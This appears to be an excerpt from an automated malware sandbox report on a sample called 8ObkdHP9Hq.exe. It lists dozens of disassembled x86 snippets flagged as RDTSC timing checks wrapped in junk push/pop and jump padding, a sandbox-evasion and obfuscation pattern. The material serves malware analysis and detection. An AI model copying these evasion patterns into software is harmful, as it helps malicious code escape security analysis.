Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51807EB second address: 518080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a jmp 00007FD0B548336Fh 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ecx, edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 518080C second address: 5180881 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD0B5348067h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, 4DAEE34Ch 0x0000000f popad 0x00000010 and ecx, 1Fh 0x00000013 jmp 00007FD0B534805Bh 0x00000018 ror eax, cl 0x0000001a jmp 00007FD0B5348066h 0x0000001f leave 0x00000020 jmp 00007FD0B5348060h 0x00000025 retn 0004h 0x00000028 nop 0x00000029 mov esi, eax 0x0000002b lea eax, dword ptr [ebp-08h] 0x0000002e xor esi, dword ptr [008E2014h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push eax 0x00000037 lea eax, dword ptr [ebp-10h] 0x0000003a push eax 0x0000003b call 00007FD0B9C287FEh 0x00000040 push FFFFFFFEh 0x00000042 jmp 00007FD0B5348060h 0x00000047 pop eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b movzx esi, di 0x0000004e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5180881 second address: 51808BA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD0B5483379h 0x00000008 adc eax, 0A0BE996h 0x0000000e jmp 00007FD0B5483371h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51808BA second address: 5180911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, eax 0x00000006 popad 0x00000007 popad 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FD0B9C28852h 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 mov esi, 29DAEC1Bh 0x00000018 call 00007FD0B5348060h 0x0000001d pushfd 0x0000001e jmp 00007FD0B5348062h 0x00000023 add eax, 709FAC18h 0x00000029 jmp 00007FD0B534805Bh 0x0000002e popfd 0x0000002f pop ecx 0x00000030 popad 0x00000031 push ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov ebx, 2174D3F4h 0x0000003a mov edx, 54053B60h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5180911 second address: 518096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0B5483374h 0x00000008 pop esi 0x00000009 jmp 00007FD0B548336Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007FD0B5483376h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD0B5483377h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 513001F second address: 5130025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130025 second address: 513002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 513002B second address: 513002F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 513002F second address: 5130033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130033 second address: 5130059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD0B534805Fh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx eax, dx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130059 second address: 513005D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 513005D second address: 5130063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130063 second address: 5130068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130068 second address: 51300E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d pushad 0x0000000e mov esi, 4EA568E1h 0x00000013 pushfd 0x00000014 jmp 00007FD0B534805Eh 0x00000019 or ch, 00000078h 0x0000001c jmp 00007FD0B534805Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 mov ecx, 2720C4CBh 0x0000002a movzx eax, di 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007FD0B534805Ah 0x00000034 xchg eax, ecx 0x00000035 pushad 0x00000036 jmp 00007FD0B534805Eh 0x0000003b mov bl, al 0x0000003d popad 0x0000003e push esi 0x0000003f jmp 00007FD0B534805Ah 0x00000044 mov dword ptr [esp], ebx 0x00000047 pushad 0x00000048 jmp 00007FD0B534805Eh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51300E3 second address: 513014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov ebx, dword ptr [ebp+10h] 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007FD0B5483376h 0x00000010 pop eax 0x00000011 mov edx, 4BC56B86h 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007FD0B5483377h 0x0000001d xor al, 0000000Eh 0x00000020 jmp 00007FD0B5483379h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov ax, dx 0x0000002e movsx edx, si 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 513014C second address: 51301B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0B5348067h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FD0B5348069h 0x0000000f xor ch, 00000056h 0x00000012 jmp 00007FD0B5348061h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov si, bx 0x00000020 mov ebx, 3D939ADEh 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD0B5348060h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51301B7 second address: 513029E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B5483371h 0x00000009 jmp 00007FD0B548336Bh 0x0000000e popfd 0x0000000f mov di, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FD0B5483370h 0x0000001f or ah, 00000038h 0x00000022 jmp 00007FD0B548336Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007FD0B5483378h 0x0000002e sbb si, 8F98h 0x00000033 jmp 00007FD0B548336Bh 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, edi 0x0000003b jmp 00007FD0B5483376h 0x00000040 push eax 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FD0B5483371h 0x00000048 or cx, AFE6h 0x0000004d jmp 00007FD0B5483371h 0x00000052 popfd 0x00000053 mov ax, AA17h 0x00000057 popad 0x00000058 xchg eax, edi 0x00000059 pushad 0x0000005a mov ebx, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushfd 0x0000005f jmp 00007FD0B5483372h 0x00000064 sbb cx, 1EB8h 0x00000069 jmp 00007FD0B548336Bh 0x0000006e popfd 0x0000006f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 513029E second address: 51302D6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD0B5348068h 0x00000008 sub esi, 5DC85918h 0x0000000e jmp 00007FD0B534805Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test esi, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ecx, edi 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51302D6 second address: 51303AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B5483379h 0x00000009 adc si, 7566h 0x0000000e jmp 00007FD0B5483371h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 je 00007FD12728166Ch 0x0000001f jmp 00007FD0B548336Ch 0x00000024 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002b jmp 00007FD0B5483370h 0x00000030 je 00007FD127281659h 0x00000036 jmp 00007FD0B5483370h 0x0000003b mov edx, dword ptr [esi+44h] 0x0000003e jmp 00007FD0B5483370h 0x00000043 or edx, dword ptr [ebp+0Ch] 0x00000046 pushad 0x00000047 push edi 0x00000048 mov edi, esi 0x0000004a pop eax 0x0000004b popad 0x0000004c test edx, 61000000h 0x00000052 pushad 0x00000053 mov ebx, 0F76D274h 0x00000058 push edx 0x00000059 pushfd 0x0000005a jmp 00007FD0B5483378h 0x0000005f or ax, 6428h 0x00000064 jmp 00007FD0B548336Bh 0x00000069 popfd 0x0000006a pop esi 0x0000006b popad 0x0000006c jne 00007FD12728164Bh 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51303AF second address: 51303B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51303B3 second address: 51303B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51303B9 second address: 51303BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51303BF second address: 51303C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51303C3 second address: 51303E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51303E8 second address: 51303EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51303EC second address: 51303F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51303F2 second address: 5130413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 03h 0x00000005 jmp 00007FD0B548336Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007FD127281600h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130413 second address: 5130417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130417 second address: 513041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 513041B second address: 5130421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120816 second address: 512081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 512081B second address: 512084C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007FD0B5348069h 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov esi, 4966C665h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 512084C second address: 512085E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B548336Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 512085E second address: 5120887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov ah, bh 0x00000010 pop ecx 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 movsx edi, cx 0x00000017 mov dx, si 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120887 second address: 512088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 512088C second address: 51208D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushfd 0x0000000d jmp 00007FD0B534805Ch 0x00000012 jmp 00007FD0B5348065h 0x00000017 popfd 0x00000018 pop eax 0x00000019 pushad 0x0000001a mov ah, bh 0x0000001c push ecx 0x0000001d pop edx 0x0000001e popad 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51208D5 second address: 51208D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51208D9 second address: 51208DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51208DD second address: 51208E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51208E3 second address: 51208E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51208E9 second address: 51208ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51208ED second address: 5120914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FD0B534805Ch 0x00000010 sub ebx, ebx 0x00000012 pushad 0x00000013 mov ecx, edi 0x00000015 mov eax, edi 0x00000017 popad 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120914 second address: 5120918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120918 second address: 5120926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120926 second address: 5120941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD127288DBFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120941 second address: 5120945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120945 second address: 512094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 512094B second address: 51209A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FD0B5348060h 0x00000015 mov ecx, esi 0x00000017 jmp 00007FD0B5348060h 0x0000001c je 00007FD12714DA77h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD0B5348067h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51209A1 second address: 5120A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 movsx edx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test byte ptr [76FB6968h], 00000002h 0x00000013 jmp 00007FD0B548336Ah 0x00000018 jne 00007FD127288D5Eh 0x0000001e pushad 0x0000001f push ecx 0x00000020 jmp 00007FD0B548336Dh 0x00000025 pop eax 0x00000026 mov esi, edx 0x00000028 popad 0x00000029 mov edx, dword ptr [ebp+0Ch] 0x0000002c pushad 0x0000002d movsx edi, cx 0x00000030 call 00007FD0B5483372h 0x00000035 pushad 0x00000036 popad 0x00000037 pop esi 0x00000038 popad 0x00000039 push esp 0x0000003a pushad 0x0000003b mov bx, cx 0x0000003e jmp 00007FD0B5483376h 0x00000043 popad 0x00000044 mov dword ptr [esp], ebx 0x00000047 jmp 00007FD0B5483370h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A2A second address: 5120A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A2E second address: 5120A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A32 second address: 5120A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A38 second address: 5120A3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A3E second address: 5120A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov dl, al 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A4F second address: 5120A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A54 second address: 5120A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A5A second address: 5120A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 mov esi, 3532662Bh 0x0000000e movzx esi, bx 0x00000011 popad 0x00000012 push dword ptr [ebp+14h] 0x00000015 jmp 00007FD0B5483373h 0x0000001a push dword ptr [ebp+10h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120A8B second address: 5120A91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120AF4 second address: 5120AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120AFA second address: 5120AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120AFE second address: 5120B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FD0B548336Bh 0x00000012 add ah, FFFFFF9Eh 0x00000015 jmp 00007FD0B5483379h 0x0000001a popfd 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130DB8 second address: 5130DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130DBE second address: 5130E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FD0B5483378h 0x0000000b adc cl, 00000048h 0x0000000e jmp 00007FD0B548336Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FD0B5483376h 0x0000001f mov ebp, esp 0x00000021 jmp 00007FD0B5483370h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD0B5483377h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5130B56 second address: 5130B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51B07FD second address: 51B0803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51B0803 second address: 51B0843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B534805Ch 0x00000009 sub ah, FFFFFFA8h 0x0000000c jmp 00007FD0B534805Bh 0x00000011 popfd 0x00000012 mov ch, 79h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 jmp 00007FD0B5348060h 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 mov esi, ebx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51B0843 second address: 51B0860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 5Ch 0x00000005 mov dx, 4F02h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0B548336Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51B0860 second address: 51B087D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51B087D second address: 51B0883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
